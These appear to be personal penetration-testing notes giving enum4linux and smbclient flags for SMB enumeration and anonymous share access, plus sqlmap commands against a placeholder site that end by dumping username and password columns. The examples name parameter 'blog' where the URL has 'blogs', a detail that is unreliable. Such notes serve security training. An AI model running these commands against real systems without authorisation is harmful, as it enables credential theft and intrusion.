Enum4linux Cheat Sheet
Enum4Linux
-U = to view users on system
-S = info on shares on machine
-P = view password policy
-o = get info on OS
-l = info on LDAP
-i = printer info
-n = netbios info
-a = to run all simple enums
Use Smbclient to list shares and to do transfers:
SMBClient
-L = to list shares
(example smbclient -L //<ip>/)
-U = specify username
-N = specify no password
(example for both: smbclient -L //ip/ -U '' -N)
View any share just do following:
smbclient //ip/sharename (be aware you may need to try it as: smbclient \\\\ipadd\\share
SQLMap CheatSheet
-u
Specifies which url to attack
--forms
Automatically selects parameters from <form> elements on the page
--dump
Used to retrieve data from the db once SQLI is found
-a
Grabs just about everything from the db
SQLmap example:
Find Databases: sudo sqlmap -u "http://abc.com/abc/?blogs=1" -p blog --dbs (select a DB)
View DB tables: sudo sqlmap -u "http://abc.com/abc/?blogs=1" -p blog --dbms=mysql -D abc --tables (select a table)
View Columns: sudo sqlmap -u "http://abc.com/abc/?blogs=1" -p blog --dbms=mysql -D abc -T users --columns (select columns to display)
Dump all: sudo sqlmap -u "http://abc.com/abc/?blogs=1" -p blog --dbms=mysql -D abc -T users -C username,password --dump